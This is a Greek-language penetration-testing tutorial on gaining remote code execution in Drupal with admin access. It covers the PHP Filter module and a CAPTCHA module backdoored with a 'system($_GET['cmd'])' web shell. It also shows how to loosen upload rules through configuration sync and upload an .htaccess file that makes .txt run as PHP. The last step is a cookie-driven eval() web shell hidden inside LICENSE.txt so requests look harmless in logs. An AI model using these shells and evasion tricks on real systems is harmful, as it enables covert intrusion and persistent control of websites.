Drupal RCE

Με το Module PHP Filter

Πρέπει να είναι εγκατεστημένο το plugin php (ελέγξτε το πηγαίνοντας στο /modules/php και αν επιστρέφει 403 τότε, υπάρχει, αν δεν βρεθεί, τότε το plugin php δεν είναι εγκατεστημένο)

Πηγαίνετε στο Modules -> (Ελέγξτε) PHP Filter -> Αποθήκευση ρυθμίσεων

Στη συνέχεια, κάντε κλικ στο Προσθήκη περιεχομένου -> Επιλέξτε Basic Page ή Article -> Γράψτε php shellcode στο σώμα -> Επιλέξτε PHP code στην Μορφή κειμένου -> Επιλέξτε Προεπισκόπηση

Τέλος, απλά αποκτήστε πρόσβαση στον νεοδημιουργηθέντα κόμβο:

curl http://drupal-site.local/node/3

Εγκατάσταση του PHP Filter Module

Από την έκδοση 8 και μετά, το PHP Filter module δεν εγκαθίσταται προεπιλεγμένα. Για να αξιοποιήσουμε αυτή τη λειτουργικότητα, θα πρέπει να εγκαταστήσουμε το module μόνοι μας.

1. Κατεβάστε την πιο πρόσφατη έκδοση του module από την ιστοσελίδα του Drupal.

2. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

3. Αφού κατεβεί, πηγαίνετε στο Administration > Reports > Available updates.

4. Κάντε κλικ στο Browse, επιλέξτε το αρχείο από τον φάκελο που το κατεβάσατε και στη συνέχεια κάντε κλικ στο Install.

5. Αφού εγκατασταθεί το module, μπορούμε να κάνουμε κλικ στο Content και να δημιουργήσουμε μια νέα βασική σελίδα, παρόμοια με το πώς κάναμε στο παράδειγμα του Drupal 7. Και πάλι, βεβαιωθείτε ότι έχετε επιλέξει PHP code από το αναπτυσσόμενο μενού Text format.

Backdoored Module

Ένα backdoored module μπορεί να δημιουργηθεί προσθέτοντας ένα shell σε ένα υπάρχον module. Τα modules μπορούν να βρεθούν στην ιστοσελίδα drupal.org. Ας επιλέξουμε ένα module όπως το CAPTCHA. Κάντε κύλιση προς τα κάτω και αντιγράψτε τον σύνδεσμο για το tar.gz αρχείο.

• Κατεβάστε το αρχείο και εξαγάγετε το περιεχόμενό του.

wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

• Δημιουργήστε ένα PHP web shell με τα περιεχόμενα:

<?php
system($_GET["cmd"]);
?>

• Στη συνέχεια, πρέπει να δημιουργήσουμε ένα .htaccess αρχείο για να αποκτήσουμε πρόσβαση στον φάκελο. Αυτό είναι απαραίτητο καθώς το Drupal αρνείται την άμεση πρόσβαση στον φάκελο /modules.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

• Η παραπάνω ρύθμιση θα εφαρμόσει κανόνες για τον φάκελο / όταν ζητάμε ένα αρχείο στον φάκελο /modules. Αντιγράψτε και τα δύο αυτά αρχεία στον φάκελο captcha και δημιουργήστε ένα αρχείο.

mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

• Υποθέτοντας ότι έχουμε διοικητική πρόσβαση στον ιστότοπο, κάντε κλικ στο Manage και στη συνέχεια στο Extend στη γραμμή πλοήγησης. Στη συνέχεια, κάντε κλικ στο κουμπί + Install new module και θα μεταφερθούμε στη σελίδα εγκατάστασης, όπως http://drupal-site.local/admin/modules/install. Περιηγηθείτε στο αρχείο Captcha με backdoor και κάντε κλικ στο Install.

• Μόλις η εγκατάσταση ολοκληρωθεί με επιτυχία, περιηγηθείτε στο /modules/captcha/shell.php για να εκτελέσετε εντολές.

Backdooring Drupal με συγχρονισμό ρυθμίσεων

Ανάρτηση που μοιράστηκε από Coiffeur0x90

Μέρος 1 (ενεργοποίηση του Media και Media Library)

Στο μενού Extend (/admin/modules), μπορείτε να ενεργοποιήσετε αυτά που φαίνεται να είναι ήδη εγκατεστημένα πρόσθετα. Από προεπιλογή, τα πρόσθετα Media και Media Library δεν φαίνεται να είναι ενεργοποιημένα, οπότε ας τα ενεργοποιήσουμε.

Πριν την ενεργοποίηση:

Μετά την ενεργοποίηση:

Μέρος 2 (εκμετάλλευση της δυνατότητας Configuration synchronization)

Θα εκμεταλλευτούμε τη δυνατότητα Configuration synchronization για να εξάγουμε (export) και να ανεβάσουμε (import) τις καταχωρίσεις ρυθμίσεων του Drupal:

• /admin/config/development/configuration/single/export

• /admin/config/development/configuration/single/import

Patch system.file.yml

Ας ξεκινήσουμε με την επιδιόρθωση της πρώτης καταχώρισης allow_insecure_uploads από:

Αρχείο: system.file.yml

...

allow_insecure_uploads: false

...

Για:

Αρχείο: system.file.yml

...

allow_insecure_uploads: true

...

Διόρθωση field.field.media.document.field_media_document.yml

Στη συνέχεια, διόρθωσε την δεύτερη καταχώρηση file_extensions από:

Αρχείο: field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Για:

Αρχείο: field.field.media.document.field_media_document.yml

...

file_directory: '[date:custom:Y]-[date:custom:m]'
file_extensions: 'htaccess txt rtf doc docx ppt pptx xls xlsx pdf odf odg odp ods odt fodt fods fodp fodg key numbers pages'

...

Δεν το χρησιμοποιώ σε αυτή την ανάρτηση, αλλά σημειώνεται ότι είναι δυνατόν να οριστεί η είσοδος file_directory με αυθαίρετο τρόπο και ότι είναι ευάλωτη σε επίθεση διαδρομής (path traversal) (έτσι μπορούμε να επιστρέψουμε μέσα στο δέντρο συστήματος αρχείων του Drupal).

Μέρος 3 (εκμετάλλευση της δυνατότητας Προσθήκη Εγγράφου)

Το τελευταίο βήμα είναι το πιο απλό και χωρίζεται σε δύο υποβήματα. Το πρώτο είναι να ανεβάσουμε ένα αρχείο σε μορφή .htaccess για να εκμεταλλευτούμε τις οδηγίες του Apache και να επιτρέψουμε στα αρχεία .txt να ερμηνεύονται από τη μηχανή PHP. Το δεύτερο είναι να ανεβάσουμε ένα αρχείο .txt που περιέχει το payload μας.

Αρχείο: .htaccess

<Files *>
SetHandler application/x-httpd-php
</Files>

# Vroum! Vroum!
# We reactivate PHP engines for all versions in order to be targetless.
<IfModule mod_php.c>
php_flag engine on
</IfModule>
<IfModule mod_php7.c>
php_flag engine on
</IfModule>
<IfModule mod_php5.c>
php_flag engine on
</IfModule>

Γιατί είναι αυτό το κόλπο ωραίο;

Επειδή μόλις το Webshell (που θα ονομάσουμε LICENSE.txt) τοποθετηθεί στον Web server, μπορούμε να μεταδώσουμε τις εντολές μας μέσω $_COOKIE και στα αρχεία καταγραφής του Web server, αυτό θα εμφανίζεται ως ένα νόμιμο GET αίτημα σε ένα αρχείο κειμένου.

Γιατί να ονομάσουμε το Webshell μας LICENSE.txt;

Απλά επειδή αν πάρουμε το παρακάτω αρχείο, για παράδειγμα core/LICENSE.txt (το οποίο είναι ήδη παρόν στον πυρήνα του Drupal), έχουμε ένα αρχείο 339 γραμμών και 17.6 KB σε μέγεθος, το οποίο είναι τέλειο για να προσθέσουμε ένα μικρό απόσπασμα κώδικα PHP στη μέση (καθώς το αρχείο είναι αρκετά μεγάλο).

Αρχείο: Διορθωμένο LICENSE.txt

...

this License, you may choose any version ever published by the Free Software
Foundation.

<?php

# We inject our payload into the cookies so that in the logs of the compromised
# server it shows up as having been requested via the GET method, in order to
# avoid raising suspicions.
if (isset($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
if (!empty($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"])) {
eval($_COOKIE["89e127753a890d9c4099c872704a0711bbafbce9"]);
} else {
phpinfo();
}
}

?>

10. If you wish to incorporate parts of the Program into other free
programs whose distribution conditions are different, write to the author

...

Μέρος 3.1 (ανέβασμα αρχείου .htaccess)

Αρχικά, εκμεταλλευόμαστε τη δυνατότητα Προσθήκη Εγγράφου (/media/add/document) για να ανεβάσουμε το αρχείο μας που περιέχει τις οδηγίες Apache (.htaccess).

Μέρος 3.2 (ανέβασμα αρχείου LICENSE.txt)

Στη συνέχεια, εκμεταλλευόμαστε ξανά τη δυνατότητα Προσθήκη Εγγράφου (/media/add/document) για να ανεβάσουμε ένα Webshell κρυμμένο μέσα σε ένα αρχείο άδειας.

Μέρος 4 (αλληλεπίδραση με το Webshell)

Το τελευταίο μέρος περιλαμβάνει την αλληλεπίδραση με το Webshell.

Όπως φαίνεται στην παρακάτω στιγμιότυπο οθόνης, αν το cookie που αναμένεται από το Webshell μας δεν είναι καθορισμένο, λαμβάνουμε το επόμενο αποτέλεσμα όταν συμβουλευόμαστε το αρχείο μέσω ενός Web browser.

Όταν ο επιτιθέμενος ορίσει το cookie, μπορεί να αλληλεπιδράσει με το Webshell και να εκτελέσει οποιαδήποτε εντολή επιθυμεί.

Και όπως μπορείτε να δείτε στα αρχεία καταγραφής, φαίνεται ότι έχει ζητηθεί μόνο ένα αρχείο txt.

Σας ευχαριστώ που αφιερώσατε χρόνο για να διαβάσετε αυτό το άρθρο, ελπίζω να σας βοηθήσει να αποκτήσετε κάποια shells.